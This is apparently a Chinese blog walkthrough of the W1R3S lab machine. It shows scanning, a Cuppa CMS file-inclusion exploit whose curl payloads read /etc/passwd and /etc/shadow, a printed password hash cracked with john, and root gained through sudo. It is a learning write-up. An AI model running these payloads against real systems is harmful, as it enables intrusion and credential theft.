專案五w1r3s.v1.0
實戰記錄
1、nmap資訊列舉
1)C段掃描
nmap -sP 192.168.186.0/24
2)掃描全埠資訊
nmap -p- 192.168.186.143
3)掃描版本資訊
nmap -p- 192.168.186.143 -sS -sV -A -T5
有用的資訊:
2、目錄爆破
dirb http://192.168.186.143/
查找出該頁面存在administrator目錄:
http://192.168.186.143/administrator/installation/
發現是Title[Cuppa CMS]框架!CuppaCMS是一套內容管理系統(CMS)!
3、谷歌搜尋:Cuppa CMS exploit
http://www.exploit-db.com/exploits/25971其實是個檔案包含漏洞,請求中的urlConfig的引數會當做程式碼執行(原來這種也能申請CVE,驚呆。。。)
LINE 22: <?php include($_REQUEST["urlConfig"]); ?>
嘗試通過get拼接,無回顯,因此改用post方式,因為漏洞是
$_REQUEST,兩種方式都是接收的。
curl --data-urlencode urlConfig=../../../../../../../../../etc/passwd http://192.168.186.143/administrator/alerts/alertConfigField.php
發現存在正確回顯,說明驗證檔案包含漏洞成功
接下來就讀取shadow裡面的資訊,因為裡面有登陸的密碼
curl --data-urlencode urlConfig=../../../../../../../../../etc/shadow http://192. 168.186.143/administrator/alerts/alertConfigField.php
在回顯中找最長的,因為裡面是包含有密碼,比如說這個
w1r3s:$6$xe/eyoTx$gttdIYrxrstpJP97hWqttvc5cGzDNyMb0vSuppux4f2CcBv3FwOt2P1GFLjZdNqjwRuP3eUjkgb/io7x9q1iP.:17567:0:99999:7:::
儲存下
使用john來暴力破解密碼,不加密碼本就是用的本地預設密碼本
使用者名稱:w1r3s
密碼:computer
然後進行ssh登陸目標主機
ssh [email protected]
然後繼續進行linux掃描,這裡用工具linpeas.sh,然後通過wget傳輸
控制端
目標端
執行掃描檔案
可利用的地方是橙色顯示,這裡發現可能可以通過sudo提權
根據提示使用sudo -l,發現許可權都是可以使用的
進一步使用sudo su去提權,發現成功了
獲取flag成功
擴充套件知識
1,定位問題函式
2,控制/etc/sudoers的最低許可權
腦圖
「其他文章」
- Docker Compose之容器編排開發初探
- 飛書前端提到的競態問題,在 Android 上怎麼解決?
- 設計模式之裝飾器模式
- 使用CSS實現多種Noise噪點效果
- 你有物件類,我有結構體,Go lang1.18入門精煉教程,由白丁入鴻儒,go lang結構體(struct)的使用EP06
- 設計模式之組合模式
- 43%非常看好TypeScript…解讀“2022前端開發者現狀報告”
- 學長告訴我,大廠MySQL都是通過SSH連線的
- 運籌帷幄決勝千里,Python3.10原生協程asyncio工業級真實協程非同步消費任務排程實踐
- 聊聊Spring事務控制策略以及@Transactional失效問題避坑
- [開源專案]可觀測、易使用的SpringBoot執行緒池
- 看到這個應用上下線方式,不禁感嘆:優雅,太優雅了!
- 【Java面試】怎麼防止快取擊穿的問題?
- 面試突擊72:輸入URL之後會執行什麼流程?
- MySQL原始碼解析之執行計劃
- Docker映象管理基礎
- OpenCV4之C 入門詳解
- k8s暴露叢集內和叢集外服務的方法
- React報錯之react component changing uncontrolled input
- 使用jmh框架進行benchmark測試